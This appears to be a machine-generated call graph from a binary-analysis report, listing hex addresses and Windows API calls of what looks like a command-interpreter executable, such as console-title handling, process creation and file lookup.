17577->17572 17577->17573 17580 7ff6a0e734ff 17578->17580 17580->17543 17581->17569 17584 7ff6a0e84c24 17583->17584 17586 7ff6a0e84c2f exit 17584->17586 17589 7ff6a0e84c50 17584->17589 17588 7ff6a0e80472 MultiByteToWideChar 17587->17588 17595 7ff6a0e84cb0 17589->17595 17592 7ff6a0e84c6c 17592->17584 17593 7ff6a0e83c24 164 API calls 17594 7ff6a0e84c84 GetProcessHeap RtlFreeHeap 17593->17594 17594->17592 17599 7ff6a0e84cfa 17595->17599 17600 7ff6a0e84cda 17595->17600 17596 7ff6a0e88f80 7 API calls 17597 7ff6a0e84c64 17596->17597 17597->17592 17597->17593 17598 7ff6a0e8eefe realloc 17598->17600 17599->17598 17599->17600 17600->17596 20148 7ff6a0e7b3f0 20150 7ff6a0e7b41a 20148->20150 20149 7ff6a0e8c2a3 iswdigit 20149->20150 20151 7ff6a0e8c2b7 20149->20151 20150->20149 20152 7ff6a0e7b42f 20150->20152 20153 7ff6a0e73278 166 API calls 20151->20153 20156 7ff6a0e7be00 20152->20156 20155 7ff6a0e7b461 20153->20155 20157 7ff6a0e7bec8 20156->20157 20158 7ff6a0e7be1b 20156->20158 20157->20155 20158->20157 20159 7ff6a0e7be67 20158->20159 20160 7ff6a0e7be47 memset 20158->20160 20162 7ff6a0e7be73 20159->20162 20163 7ff6a0e7bf29 20159->20163 20166 7ff6a0e7beaf 20159->20166 20263 7ff6a0e7bff0 20160->20263 20164 7ff6a0e7be92 20162->20164 20167 7ff6a0e7bf0c 20162->20167 20165 7ff6a0e7cd90 166 API calls 20163->20165 20173 7ff6a0e7bea1 20164->20173 20190 7ff6a0e7c620 GetConsoleTitleW 20164->20190 20169 7ff6a0e7bf33 20165->20169 20166->20157 20171 7ff6a0e7bff0 185 API calls 20166->20171 20301 7ff6a0e7b0d8 memset 20167->20301 20169->20166 20174 7ff6a0e7bf70 20169->20174 20177 7ff6a0e788a8 _wcsicmp 20169->20177 20171->20157 20173->20166 20178 7ff6a0e7af98 2 API calls 20173->20178 20184 7ff6a0e7bf75 20174->20184 20414 7ff6a0e771ec 20174->20414 20175 7ff6a0e7bf1e 20175->20166 20180 7ff6a0e7bf5a 20177->20180 20178->20166 20179 7ff6a0e7bfa9 20179->20166 20181 7ff6a0e7cd90 166 API calls 20179->20181 20180->20174 20361 7ff6a0e80a6c 20180->20361 20183 7ff6a0e7bfbb 20181->20183 20183->20166 20186 7ff6a0e8081c 166 API calls 20183->20186 20185 7ff6a0e7b0d8 194 API calls 20184->20185 20187 7ff6a0e7bf7f 20185->20187 20186->20184 20187->20166 20234 7ff6a0e85ad8 20187->20234 20191 7ff6a0e7ca2f 20190->20191 20193 7ff6a0e7c675 20190->20193 20192 7ff6a0e8c5fc GetLastError 20191->20192 20195 7ff6a0e73278 166 API calls 20191->20195 20196 7ff6a0e8855c ??_V@YAXPEAX 20191->20196 20192->20191 20194 7ff6a0e7ca40 17 API calls 20193->20194 20206 7ff6a0e7c69b 20194->20206 20195->20191 20196->20191 20197 7ff6a0e8291c 8 API calls 20200 7ff6a0e7c762 20197->20200 20198 7ff6a0e7c9b5 20203 7ff6a0e8855c ??_V@YAXPEAX 20198->20203 20199 7ff6a0e789c0 23 API calls 20204 7ff6a0e7c964 20199->20204 20200->20191 20200->20197 20202 7ff6a0e8855c ??_V@YAXPEAX 20200->20202 20200->20204 20218 7ff6a0e7c83d 20200->20218 20221 7ff6a0e7c78a wcschr 20200->20221 20223 7ff6a0e7ca25 20200->20223 20225 7ff6a0e8c684 20200->20225 20228 7ff6a0e7ca2a 20200->20228 20201 7ff6a0e7c978 towupper 20201->20204 20202->20200 20205 7ff6a0e7c855 20203->20205 20204->20192 20204->20198 20204->20199 20204->20200 20204->20201 20204->20204 20209 7ff6a0e9ec14 173 API calls 20204->20209 20230 7ff6a0e7ca16 GetLastError 20204->20230 20208 7ff6a0e7c872 20205->20208 20212 7ff6a0e8c6b8 SetConsoleTitleW 20205->20212 20206->20191 20206->20198 20206->20200 20207 7ff6a0e7d3f0 223 API calls 20206->20207 20210 7ff6a0e7c741 20207->20210 20211 7ff6a0e8855c ??_V@YAXPEAX 20208->20211 20209->20200 20213 7ff6a0e7c74d 20210->20213 20215 7ff6a0e7c8b5 wcsncmp 20210->20215 20214 7ff6a0e7c87c 20211->20214 20212->20208 20213->20200 20216 7ff6a0e7bd38 207 API calls 20213->20216 20217 7ff6a0e88f80 7 API calls 20214->20217 20215->20200 20215->20213 20216->20200 20219 7ff6a0e7c88e 20217->20219 20420 7ff6a0e7cb40 20218->20420 20219->20173 20221->20200 20226 7ff6a0e73278 166 API calls 20223->20226 20227 7ff6a0e73278 166 API calls 20225->20227 20226->20191 20227->20191 20229 7ff6a0e89158 7 API calls 20228->20229 20229->20191 20232 7ff6a0e73278 166 API calls 20230->20232 20233 7ff6a0e8c675 20232->20233 20233->20191 20235 7ff6a0e7cd90 166 API calls 20234->20235 20236 7ff6a0e85b12 20235->20236 20237 7ff6a0e85b8b 20236->20237 20238 7ff6a0e7cb40 166 API calls 20236->20238 20240 7ff6a0e88f80 7 API calls 20237->20240 20239 7ff6a0e85b26 20238->20239 20239->20237 20242 7ff6a0e80a6c 273 API calls 20239->20242 20241 7ff6a0e7bf99 20240->20241 20241->20173 20243 7ff6a0e85b43 20242->20243 20244 7ff6a0e85bb8 20243->20244 20245 7ff6a0e85b48 GetConsoleTitleW 20243->20245 20246 7ff6a0e85bbd GetConsoleTitleW 20244->20246 20247 7ff6a0e85bf4 20244->20247 20248 7ff6a0e7cad4 172 API calls 20245->20248 20249 7ff6a0e7cad4 172 API calls 20246->20249 20250 7ff6a0e85bfd 20247->20250 20251 7ff6a0e8f452 20247->20251 20252 7ff6a0e85b66 20248->20252 20253 7ff6a0e85bdb 20249->20253 20250->20237 20257 7ff6a0e85c1b 20250->20257 20258 7ff6a0e8f462 20250->20258 20255 7ff6a0e83c24 166 API calls 20251->20255 20436 7ff6a0e84224 InitializeProcThreadAttributeList 20252->20436 20496 7ff6a0e796e8 20253->20496 20255->20237 20259 7ff6a0e73278 166 API calls 20257->20259 20261 7ff6a0e73278 166 API calls 20258->20261 20259->20237 20260 7ff6a0e85b7f 20262 7ff6a0e85c3c SetConsoleTitleW 20260->20262 20261->20237 20262->20237 20264 7ff6a0e7c01c 20263->20264 20265 7ff6a0e7c0c4 20263->20265 20266 7ff6a0e7c086 20264->20266 20267 7ff6a0e7c022 20264->20267 20265->20159 20270 7ff6a0e7c144 20266->20270 20283 7ff6a0e7c094 20266->20283 20268 7ff6a0e7c113 20267->20268 20269 7ff6a0e7c030 20267->20269 20279 7ff6a0e7ff70 2 API calls 20268->20279 20284 7ff6a0e7c053 20268->20284 20271 7ff6a0e7c039 wcschr 20269->20271 20269->20284 20275 7ff6a0e7c151 20270->20275 20290 7ff6a0e7c1c8 20270->20290 20272 7ff6a0e7c301 20271->20272 20271->20284 20278 7ff6a0e7cd90 166 API calls 20272->20278 20273 7ff6a0e7c058 20285 7ff6a0e7ff70 2 API calls 20273->20285 20288 7ff6a0e7c073 20273->20288 20274 7ff6a0e7c0c6 20276 7ff6a0e7c0cf wcschr 20274->20276 20274->20288 20771 7ff6a0e7c460 20275->20771 20282 7ff6a0e7c1be 20276->20282 20276->20288 20277 7ff6a0e7c460 183 API calls 20277->20283 20300 7ff6a0e7c30b 20278->20300 20279->20284 20286 7ff6a0e7cd90 166 API calls 20282->20286 20283->20265 20283->20277 20284->20273 20284->20274 20291 7ff6a0e7c211 20284->20291 20285->20288 20286->20290 20287 7ff6a0e7c460 183 API calls 20287->20265 20288->20265 20289 7ff6a0e7c460 183 API calls 20288->20289 20289->20288 20290->20265 20290->20291 20292 7ff6a0e7c285 20290->20292 20296 7ff6a0e7d840 178 API calls 20290->20296 20293 7ff6a0e7ff70 2 API calls 20291->20293 20292->20291 20297 7ff6a0e7b6b0 170 API calls 20292->20297 20293->20265 20294 7ff6a0e7d840 178 API calls 20294->20300 20295 7ff6a0e7b6b0 170 API calls 20295->20284 20296->20290 20298 7ff6a0e7c2ac 20297->20298 20298->20288 20298->20291 20299 7ff6a0e7c3d4 20299->20288 20299->20291 20299->20295 20300->20265 20300->20291 20300->20294 20300->20299 20302 7ff6a0e7ca40 17 API calls 20301->20302 20318 7ff6a0e7b162 20302->20318 20303 7ff6a0e7b2f7 ??_V@YAXPEAX 20304 7ff6a0e7b303 20303->20304 20306 7ff6a0e88f80 7 API calls 20304->20306 20305 7ff6a0e81ea0 8 API calls 20305->20318 20309 7ff6a0e7b315 20306->20309 20307 7ff6a0e7b1d9 20308 7ff6a0e7cd90 166 API calls 20307->20308 20326 7ff6a0e7b1ed 20307->20326 20308->20326 20309->20164 20309->20175 20311 7ff6a0e7b2e1 20311->20303 20311->20304 20312 7ff6a0e7b228 _get_osfhandle 20314 7ff6a0e7b23f _get_osfhandle 20312->20314 20312->20326 20313 7ff6a0e8bfef _get_osfhandle SetFilePointer 20315 7ff6a0e8c01d 20313->20315 20313->20326 20314->20326 20317 7ff6a0e833f0 _vsnwprintf 20315->20317 20320 7ff6a0e8c038 20317->20320 20318->20305 20318->20307 20318->20311 20318->20318 20319 7ff6a0e801b8 6 API calls 20319->20326 20325 7ff6a0e73278 166 API calls 20320->20325 20321 7ff6a0e8c1c3 20322 7ff6a0e833f0 _vsnwprintf 20321->20322 20322->20320 20323 7ff6a0e7d208 _close 20323->20326 20324 7ff6a0e826e0 19 API calls 20324->20326 20328 7ff6a0e8c1f9 20325->20328 20326->20311 20326->20312 20326->20313 20326->20319 20326->20321 20326->20323 20326->20324 20327 7ff6a0e8c060 20326->20327 20329 7ff6a0e8c246 20326->20329 20330 7ff6a0e8c1a5 20326->20330 20332 7ff6a0e7b038 _dup2 20326->20332 20337 7ff6a0e7b356 20326->20337 20785 7ff6a0e7affc _dup 20326->20785 20787 7ff6a0e9f318 _get_osfhandle GetFileType 20326->20787 20327->20329 20333 7ff6a0e809f4 2 API calls 20327->20333 20331 7ff6a0e7af98 2 API calls 20328->20331 20334 7ff6a0e7af98 2 API calls 20329->20334 20335 7ff6a0e7b038 _dup2 20330->20335 20331->20311 20332->20326 20338 7ff6a0e8c084 20333->20338 20339 7ff6a0e8c24b 20334->20339 20336 7ff6a0e8c1b7 20335->20336 20340 7ff6a0e8c1be 20336->20340 20341 7ff6a0e8c207 20336->20341 20344 7ff6a0e7af98 2 API calls 20337->20344 20342 7ff6a0e7b900 166 API calls 20338->20342 20343 7ff6a0e9f1d8 166 API calls 20339->20343 20345 7ff6a0e7d208 _close 20340->20345 20347 7ff6a0e7d208 _close 20341->20347 20346 7ff6a0e8c08c 20342->20346 20343->20311 20348 7ff6a0e8c211 20344->20348 20345->20321 20349 7ff6a0e8c094 wcsrchr 20346->20349 20359 7ff6a0e8c0ad 20346->20359 20347->20337 20350 7ff6a0e833f0 _vsnwprintf 20348->20350 20349->20359 20351 7ff6a0e8c22c 20350->20351 20352 7ff6a0e73278 166 API calls 20351->20352 20352->20311 20353 7ff6a0e8c106 20354 7ff6a0e7ff70 2 API calls 20353->20354 20356 7ff6a0e8c13b 20354->20356 20355 7ff6a0e8c0e0 _wcsnicmp 20355->20359 20356->20329 20357 7ff6a0e8c146 SearchPathW 20356->20357 20357->20329 20358 7ff6a0e8c188 20357->20358 20360 7ff6a0e826e0 19 API calls 20358->20360 20359->20353 20359->20355 20360->20330 20362 7ff6a0e81ea0 8 API calls 20361->20362 20363 7ff6a0e80ab9 20362->20363 20364 7ff6a0e80b12 memset 20363->20364 20365 7ff6a0e8d927 20363->20365 20366 7ff6a0e80aee _wcsnicmp 20363->20366 20372 7ff6a0e8128f ??_V@YAXPEAX 20363->20372 20367 7ff6a0e7ca40 17 API calls 20364->20367 20369 7ff6a0e8081c 166 API calls 20365->20369 20366->20364 20366->20365 20368 7ff6a0e80b5a 20367->20368 20371 7ff6a0e7b364 17 API calls 20368->20371 20382 7ff6a0e8d94e 20368->20382 20370 7ff6a0e8d933 20369->20370 20370->20364 20370->20372 20396 7ff6a0e80b6f 20371->20396 20373 7ff6a0e8d96b ??_V@YAXPEAX 20373->20382 20374 7ff6a0e80b8c wcschr 20374->20396 20376 7ff6a0e83bac wcschr 20376->20396 20377 7ff6a0e8d99a wcschr 20377->20382 20378 7ff6a0e80c0f wcsrchr 20378->20382 20378->20396 20379 7ff6a0e8d9ca GetFileAttributesW 20379->20382 20400 7ff6a0e8da64 20379->20400 20380 7ff6a0e8da74 20381 7ff6a0e8da90 GetFileAttributesW 20380->20381 20380->20400 20381->20382 20383 7ff6a0e8daa8 GetLastError 20381->20383 20382->20373 20382->20377 20382->20379 20384 7ff6a0e8d9fd ??_V@YAXPEAX 20382->20384 20382->20400 20385 7ff6a0e8dab9 20383->20385 20383->20400 20384->20382 20385->20382 20386 7ff6a0e7cd90 166 API calls 20386->20396 20387 7ff6a0e83060 171 API calls 20387->20396 20388 7ff6a0e8081c 166 API calls 20388->20396 20389 7ff6a0e7d3f0 223 API calls 20389->20396 20390 7ff6a0e81ea0 8 API calls 20390->20396 20391 7ff6a0e7af74 170 API calls 20391->20396 20392 7ff6a0e80d71 wcsrchr 20393 7ff6a0e80d97 NeedCurrentDirectoryForExePathW 20392->20393 20392->20396 20393->20382 20393->20396 20395 7ff6a0e80fb1 wcsrchr 20395->20396 20397 7ff6a0e80fd0 wcschr 20395->20397 20396->20372 20396->20374 20396->20376 20396->20378 20396->20380 20396->20382 20396->20386 20396->20387 20396->20388 20396->20389 20396->20390 20396->20391 20396->20392 20396->20395 20396->20397 20398 7ff6a0e82eb4 22 API calls 20396->20398 20402 7ff6a0e810fd wcsrchr 20396->20402 20411 7ff6a0e81087 _wcsicmp 20396->20411 20788 7ff6a0e8291c GetDriveTypeW 20396->20788 20791 7ff6a0e82efc 20396->20791 20399 7ff6a0e80fed wcschr 20397->20399 20397->20400 20398->20396 20399->20396 20399->20400 20402->20396 20403 7ff6a0e8111a _wcsicmp 20402->20403 20404 7ff6a0e8123d 20403->20404 20405 7ff6a0e81138 _wcsicmp 20403->20405 20407 7ff6a0e81175 20404->20407 20408 7ff6a0e81250 ??_V@YAXPEAX 20404->20408 20405->20404 20406 7ff6a0e810c5 20405->20406 20406->20407 20409 7ff6a0e81169 ??_V@YAXPEAX 20406->20409 20410 7ff6a0e88f80 7 API calls 20407->20410 20408->20407 20409->20407 20412 7ff6a0e81189 20410->20412 20411->20380 20413 7ff6a0e810a7 _wcsicmp 20411->20413 20412->20174 20413->20380 20413->20406 20415 7ff6a0e77279 20414->20415 20416 7ff6a0e77211 _setjmp 20414->20416 20415->20179 20416->20415 20418 7ff6a0e77265 20416->20418 20805 7ff6a0e772b0 20418->20805 20421 7ff6a0e7cb63 20420->20421 20422 7ff6a0e7cd90 166 API calls 20421->20422 20423 7ff6a0e7c848 20422->20423 20423->20205 20424 7ff6a0e7cad4 20423->20424 20425 7ff6a0e7cad9 20424->20425 20433 7ff6a0e7cb05 20424->20433 20426 7ff6a0e7cd90 166 API calls 20425->20426 20425->20433 20427 7ff6a0e8c722 20426->20427 20428 7ff6a0e8c72e GetConsoleTitleW 20427->20428 20427->20433 20429 7ff6a0e8c74a 20428->20429 20428->20433 20430 7ff6a0e7b6b0 170 API calls 20429->20430 20435 7ff6a0e8c778 20430->20435 20431 7ff6a0e8c7ec 20432 7ff6a0e7ff70 2 API calls 20431->20432 20432->20433 20433->20205 20434 7ff6a0e8c7dd SetConsoleTitleW 20434->20431 20435->20431 20435->20434 20437 7ff6a0e842ab UpdateProcThreadAttribute 20436->20437 20438 7ff6a0e8ecd4 GetLastError 20436->20438 20439 7ff6a0e8ecf0 GetLastError 20437->20439 20440 7ff6a0e842eb memset memset GetStartupInfoW 20437->20440 20441 7ff6a0e8ecee 20438->20441 20533 7ff6a0e99eec 20439->20533 20443 7ff6a0e83a90 170 API calls 20440->20443 20445 7ff6a0e843a8 20443->20445 20446 7ff6a0e7b900 166 API calls 20445->20446 20447 7ff6a0e843bb 20446->20447 20448 7ff6a0e843cc 20447->20448 20449 7ff6a0e84638 _local_unwind 20447->20449 20450 7ff6a0e843de wcsrchr 20448->20450 20457 7ff6a0e84415 20448->20457 20449->20448 20451 7ff6a0e843f7 lstrcmpW 20450->20451 20450->20457 20453 7ff6a0e84668 20451->20453 20451->20457 20521 7ff6a0e99044 20453->20521 20454 7ff6a0e8441a 20456 7ff6a0e8442a CreateProcessW 20454->20456 20459 7ff6a0e84596 CreateProcessAsUserW 20454->20459 20458 7ff6a0e8448b 20456->20458 20520 7ff6a0e85a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 20457->20520 20460 7ff6a0e84495 CloseHandle 20458->20460 20461 7ff6a0e84672 GetLastError 20458->20461 20459->20458 20462 7ff6a0e8498c 8 API calls 20460->20462 20475 7ff6a0e8468d 20461->20475 20463 7ff6a0e844c5 20462->20463 20467 7ff6a0e844cd 20463->20467 20463->20475 20464 7ff6a0e847a3 20464->20260 20465 7ff6a0e844f8 20465->20464 20466 7ff6a0e84612 20465->20466 20470 7ff6a0e85cb4 7 API calls 20465->20470 20471 7ff6a0e8461c 20466->20471 20473 7ff6a0e847e1 CloseHandle 20466->20473 20467->20464 20467->20465 20485 7ff6a0e9a250 33 API calls 20467->20485 20468 7ff6a0e7cd90 166 API calls 20469 7ff6a0e84724 20468->20469 20472 7ff6a0e8472c _local_unwind 20469->20472 20480 7ff6a0e8473d 20469->20480 20474 7ff6a0e84517 20470->20474 20476 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20471->20476 20472->20480 20473->20471 20477 7ff6a0e833f0 _vsnwprintf 20474->20477 20475->20467 20475->20468 20478 7ff6a0e847fa DeleteProcThreadAttributeList 20476->20478 20479 7ff6a0e84544 20477->20479 20481 7ff6a0e88f80 7 API calls 20478->20481 20482 7ff6a0e8498c 8 API calls 20479->20482 20486 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20480->20486 20483 7ff6a0e84820 20481->20483 20484 7ff6a0e84558 20482->20484 20483->20260 20487 7ff6a0e84564 20484->20487 20488 7ff6a0e847ae 20484->20488 20485->20465 20490 7ff6a0e8475b _local_unwind 20486->20490 20491 7ff6a0e8498c 8 API calls 20487->20491 20489 7ff6a0e833f0 _vsnwprintf 20488->20489 20489->20466 20490->20467 20492 7ff6a0e84577 20491->20492 20492->20471 20493 7ff6a0e8457f 20492->20493 20494 7ff6a0e9a920 210 API calls 20493->20494 20495 7ff6a0e84584 20494->20495 20495->20471 20513 7ff6a0e79737 20496->20513 20498 7ff6a0e7977d memset 20500 7ff6a0e7ca40 17 API calls 20498->20500 20499 7ff6a0e7cd90 166 API calls 20499->20513 20500->20513 20501 7ff6a0e8b76e 20504 7ff6a0e73278 166 API calls 20501->20504 20502 7ff6a0e8b7b3 20503 7ff6a0e8b79a 20506 7ff6a0e8855c ??_V@YAXPEAX 20503->20506 20507 7ff6a0e8b787 20504->20507 20505 7ff6a0e7b364 17 API calls 20505->20513 20506->20502 20508 7ff6a0e8b795 20507->20508 20623 7ff6a0e9e944 20507->20623 20631 7ff6a0e97694 20508->20631 20513->20498 20513->20499 20513->20501 20513->20502 20513->20503 20513->20505 20513->20513 20514 7ff6a0e7986d 20513->20514 20535 7ff6a0e81fac memset 20513->20535 20562 7ff6a0e7ce10 20513->20562 20612 7ff6a0e796b4 20513->20612 20617 7ff6a0e85920 20513->20617 20516 7ff6a0e7988c 20514->20516 20517 7ff6a0e79880 ??_V@YAXPEAX 20514->20517 20518 7ff6a0e88f80 7 API calls 20516->20518 20517->20516 20519 7ff6a0e7989d 20518->20519 20519->20260 20522 7ff6a0e83a90 170 API calls 20521->20522 20523 7ff6a0e99064 20522->20523 20524 7ff6a0e9906e 20523->20524 20525 7ff6a0e99083 20523->20525 20526 7ff6a0e8498c 8 API calls 20524->20526 20528 7ff6a0e7cd90 166 API calls 20525->20528 20527 7ff6a0e99081 20526->20527 20527->20457 20529 7ff6a0e9909b 20528->20529 20529->20527 20530 7ff6a0e8498c 8 API calls 20529->20530 20531 7ff6a0e990ec 20530->20531 20532 7ff6a0e7ff70 2 API calls 20531->20532 20532->20527 20534 7ff6a0e8ed0a DeleteProcThreadAttributeList 20533->20534 20534->20441 20536 7ff6a0e8203b 20535->20536 20537 7ff6a0e820b0 20536->20537 20538 7ff6a0e82094 20536->20538 20539 7ff6a0e83060 171 API calls 20537->20539 20541 7ff6a0e8211c 20537->20541 20540 7ff6a0e820a6 20538->20540 20542 7ff6a0e73278 166 API calls 20538->20542 20539->20541 20543 7ff6a0e88f80 7 API calls 20540->20543 20541->20540 20544 7ff6a0e82e44 2 API calls 20541->20544 20542->20540 20545 7ff6a0e82325 20543->20545 20546 7ff6a0e82148 20544->20546 20545->20513 20546->20540 20547 7ff6a0e82d70 3 API calls 20546->20547 20548 7ff6a0e821af 20547->20548 20549 7ff6a0e7b900 166 API calls 20548->20549 20551 7ff6a0e821d0 20549->20551 20550 7ff6a0e8e04a ??_V@YAXPEAX 20550->20540 20551->20550 20552 7ff6a0e8221c wcsspn 20551->20552 20561 7ff6a0e822a4 ??_V@YAXPEAX 20551->20561 20553 7ff6a0e7b900 166 API calls 20552->20553 20555 7ff6a0e8223b 20553->20555 20555->20550 20559 7ff6a0e82252 20555->20559 20556 7ff6a0e8228f 20557 7ff6a0e7d3f0 223 API calls 20556->20557 20557->20561 20558 7ff6a0e8e06d wcschr 20558->20559 20559->20556 20559->20558 20560 7ff6a0e8e090 towupper 20559->20560 20560->20556 20560->20559 20561->20540 20563 7ff6a0e7d0f8 20562->20563 20611 7ff6a0e7ce5b 20562->20611 20564 7ff6a0e88f80 7 API calls 20563->20564 20567 7ff6a0e7d10a 20564->20567 20565 7ff6a0e8c860 20566 7ff6a0e8c97c 20565->20566 20569 7ff6a0e9ee88 390 API calls 20565->20569 20570 7ff6a0e9e9b4 197 API calls 20566->20570 20567->20513 20571 7ff6a0e8c879 20569->20571 20572 7ff6a0e8c981 longjmp 20570->20572 20573 7ff6a0e8c882 EnterCriticalSection LeaveCriticalSection 20571->20573 20574 7ff6a0e8c95c 20571->20574 20575 7ff6a0e8c99a 20572->20575 20581 7ff6a0e7d0e3 20573->20581 20574->20566 20579 7ff6a0e796b4 186 API calls 20574->20579 20575->20563 20578 7ff6a0e8c9b3 ??_V@YAXPEAX 20575->20578 20576 7ff6a0e7cd90 166 API calls 20576->20611 20578->20563 20579->20574 20580 7ff6a0e7ceaa _tell 20582 7ff6a0e7d208 _close 20580->20582 20581->20513 20582->20611 20583 7ff6a0e8c9d5 20584 7ff6a0e9d610 167 API calls 20583->20584 20586 7ff6a0e8c9da 20584->20586 20585 7ff6a0e7b900 166 API calls 20585->20611 20587 7ff6a0e8ca07 20586->20587 20589 7ff6a0e9bfec 176 API calls 20586->20589 20588 7ff6a0e9e91c 198 API calls 20587->20588 20593 7ff6a0e8ca0c 20588->20593 20590 7ff6a0e8c9f1 20589->20590 20592 7ff6a0e73240 166 API calls 20590->20592 20591 7ff6a0e7cf33 memset 20591->20611 20592->20587 20593->20513 20594 7ff6a0e7ca40 17 API calls 20594->20611 20595 7ff6a0e7d184 wcschr 20595->20611 20596 7ff6a0e9bfec 176 API calls 20596->20611 20597 7ff6a0e8c9c9 20599 7ff6a0e8855c ??_V@YAXPEAX 20597->20599 20598 7ff6a0e7d1a7 wcschr 20598->20611 20599->20563 20601 7ff6a0e80a6c 273 API calls 20601->20611 20602 7ff6a0e7be00 635 API calls 20602->20611 20603 7ff6a0e83448 166 API calls 20603->20611 20604 7ff6a0e80580 12 API calls 20606 7ff6a0e7d003 GetConsoleOutputCP GetCPInfo 20604->20606 20605 7ff6a0e7cfab _wcsicmp 20605->20611 20607 7ff6a0e804f4 3 API calls 20606->20607 20607->20611 20609 7ff6a0e81fac 238 API calls 20609->20611 20610 7ff6a0e7d044 ??_V@YAXPEAX 20610->20611 20611->20563 20611->20565 20611->20575 20611->20576 20611->20581 20611->20583 20611->20585 20611->20591 20611->20594 20611->20595 20611->20596 20611->20597 20611->20598 20611->20601 20611->20602 20611->20603 20611->20604 20611->20605 20611->20609 20611->20610 20637 7ff6a0e80494 20611->20637 20650 7ff6a0e7df60 20611->20650 20670 7ff6a0e9778c 20611->20670 20701 7ff6a0e9c738 20611->20701 20613 7ff6a0e8b6e2 RevertToSelf CloseHandle 20612->20613 20614 7ff6a0e796c8 20612->20614 20615 7ff6a0e796ce 20614->20615 20616 7ff6a0e76a48 184 API calls 20614->20616 20615->20513 20616->20614 20618 7ff6a0e8596c 20617->20618 20622 7ff6a0e85a12 20617->20622 20619 7ff6a0e8598d VirtualQuery 20618->20619 20618->20622 20621 7ff6a0e859ad 20619->20621 20619->20622 20620 7ff6a0e859b7 VirtualQuery 20620->20621 20620->20622 20621->20620 20621->20622 20622->20513 20624 7ff6a0e9e990 20623->20624 20625 7ff6a0e9e954 20623->20625 20626 7ff6a0e9e9b4 197 API calls 20624->20626 20627 7ff6a0e9ee88 390 API calls 20625->20627 20628 7ff6a0e9e995 longjmp 20626->20628 20629 7ff6a0e9e964 20627->20629 20629->20624 20630 7ff6a0e796b4 186 API calls 20629->20630 20630->20629 20632 7ff6a0e976a3 20631->20632 20633 7ff6a0e976b7 20632->20633 20634 7ff6a0e796b4 186 API calls 20632->20634 20635 7ff6a0e9e9b4 197 API calls 20633->20635 20634->20632 20636 7ff6a0e976bc longjmp 20635->20636 20638 7ff6a0e804a4 20637->20638 20639 7ff6a0e826e0 19 API calls 20638->20639 20640 7ff6a0e804b9 _get_osfhandle SetFilePointer 20638->20640 20641 7ff6a0e8d845 20638->20641 20643 7ff6a0e8d839 20638->20643 20646 7ff6a0e73278 166 API calls 20638->20646 20639->20638 20640->20611 20642 7ff6a0e9f1d8 166 API calls 20641->20642 20645 7ff6a0e8d837 20642->20645 20644 7ff6a0e73278 166 API calls 20643->20644 20644->20645 20647 7ff6a0e8d819 _getch 20646->20647 20647->20638 20648 7ff6a0e8d832 20647->20648 20711 7ff6a0e9bde4 EnterCriticalSection LeaveCriticalSection 20648->20711 20651 7ff6a0e7df93 20650->20651 20652 7ff6a0e7dfe2 20650->20652 20651->20652 20653 7ff6a0e7df9f GetProcessHeap RtlFreeHeap 20651->20653 20654 7ff6a0e7e100 VirtualFree 20652->20654 20655 7ff6a0e7e00b _setjmp 20652->20655 20653->20651 20653->20652 20654->20652 20656 7ff6a0e7e04a 20655->20656 20657 7ff6a0e7e0c3 20655->20657 20658 7ff6a0e7e600 473 API calls 20656->20658 20657->20580 20659 7ff6a0e7e073 20658->20659 20660 7ff6a0e7e081 20659->20660 20661 7ff6a0e7e0e0 longjmp 20659->20661 20662 7ff6a0e7d250 475 API calls 20660->20662 20669 7ff6a0e7e0b0 20661->20669 20663 7ff6a0e7e086 20662->20663 20666 7ff6a0e7e600 473 API calls 20663->20666 20663->20669 20667 7ff6a0e7e0a7 20666->20667 20668 7ff6a0e9d610 167 API calls 20667->20668 20667->20669 20668->20669 20669->20657 20712 7ff6a0e9d3fc 20669->20712 20673 7ff6a0e977bc 20670->20673 20671 7ff6a0e97989 20694 7ff6a0e979ef 20671->20694 20764 7ff6a0e976e0 20671->20764 20672 7ff6a0e97aca 20676 7ff6a0e834a0 166 API calls 20672->20676 20673->20671 20673->20672 20674 7ff6a0e979c0 20673->20674 20677 7ff6a0e97984 20673->20677 20678 7ff6a0e97ab5 20673->20678 20682 7ff6a0e97a00 20673->20682 20685 7ff6a0e83448 166 API calls 20673->20685 20692 7ff6a0e9778c 166 API calls 20673->20692 20673->20694 20680 7ff6a0e834a0 166 API calls 20674->20680 20679 7ff6a0e97adb 20676->20679 20677->20671 20677->20674 20681 7ff6a0e83448 166 API calls 20678->20681 20683 7ff6a0e83448 166 API calls 20679->20683 20686 7ff6a0e97af0 20679->20686 20689 7ff6a0e979d6 20680->20689 20681->20694 20688 7ff6a0e97a0b 20682->20688 20682->20694 20699 7ff6a0e97a33 20682->20699 20683->20686 20684 7ff6a0e9778c 166 API calls 20687 7ff6a0e97afb 20684->20687 20685->20673 20686->20684 20687->20671 20695 7ff6a0e83448 166 API calls 20687->20695 20688->20694 20696 7ff6a0e834a0 166 API calls 20688->20696 20690 7ff6a0e979e7 20689->20690 20693 7ff6a0e83448 166 API calls 20689->20693 20760 7ff6a0e97730 20690->20760 20692->20673 20693->20690 20694->20611 20695->20671 20698 7ff6a0e97a23 20696->20698 20697 7ff6a0e83448 166 API calls 20697->20694 20700 7ff6a0e9778c 166 API calls 20698->20700 20699->20697 20700->20690 20702 7ff6a0e9c775 20701->20702 20703 7ff6a0e9c7ab 20701->20703 20704 7ff6a0e7cd90 166 API calls 20702->20704 20705 7ff6a0e9c781 20703->20705 20706 7ff6a0e9c8d4 20703->20706 20708 7ff6a0e7b6b0 170 API calls 20703->20708 20709 7ff6a0e7b038 _dup2 20703->20709 20710 7ff6a0e7d208 _close 20703->20710 20704->20705 20705->20706 20707 7ff6a0e7b0d8 194 API calls 20705->20707 20706->20611 20707->20706 20708->20703 20709->20703 20710->20703 20723 7ff6a0e9d419 20712->20723 20713 7ff6a0e8cadf 20714 7ff6a0e83448 166 API calls 20714->20723 20715 7ff6a0e9d592 20717 7ff6a0e83448 166 API calls 20715->20717 20716 7ff6a0e9d5c4 20718 7ff6a0e83448 166 API calls 20716->20718 20720 7ff6a0e9d5a5 20717->20720 20718->20713 20722 7ff6a0e9d5ba 20720->20722 20726 7ff6a0e83448 166 API calls 20720->20726 20721 7ff6a0e9d546 20721->20716 20724 7ff6a0e9d555 20721->20724 20730 7ff6a0e9d36c 20722->20730 20723->20713 20723->20714 20723->20715 20723->20716 20723->20724 20725 7ff6a0e9d541 20723->20725 20728 7ff6a0e9d3fc 166 API calls 20723->20728 20737 7ff6a0e9d31c 20724->20737 